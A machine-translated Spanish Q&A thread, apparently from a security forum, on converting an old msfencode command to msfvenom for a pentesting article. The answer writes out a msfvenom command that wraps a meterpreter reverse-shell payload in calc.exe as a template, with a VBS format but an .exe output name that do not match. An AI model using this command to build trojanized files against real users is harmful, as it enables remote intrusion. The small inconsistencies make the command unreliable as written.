Ejemplo práctico de pentesting usando msfvenom

1

Estoy actualizando un artículo pequeño que está desactualizado, pero no sé mucho acerca de la prueba de contenido.

El marco es mfsvenom y el código es:

msfencode -x calc.exe -t loop-vbs -o final.vbs

Antes de que se usara msfencode y msfpayload pero ahora está desactualizado. Lo intenté:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=localhost LPORT=number -f vbs ...   

Es solo porque algún usuario me preguntó acerca de un artículo de pentesting si era posible hacerlo con msfvenom . Pero no sé cómo actualizarlo correctamente.

    
pregunta Sir Jack 18.04.2017 - 21:13
fuente

1 respuesta

0

Mientras tanto, en msfencode :

-x le dijo a msfencode que quieres usar calc.exe como plantilla;

-t es el formato de salida;

-o archivo de salida.

Para convertirlo a msfvenom no cambia mucho:

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=localhost LPORT=number -x calc.exe -f loop-vbs -o final.exe

Tenga en cuenta que el único cambio [indicador] en la perspectiva msfencode es de -t a -f .

Puede ejecutar msfvenom --list formats para conocer el formato de salida disponible.

    
respondido por el slayer owner 10.08.2018 - 21:35
fuente

Lea otras preguntas en las etiquetas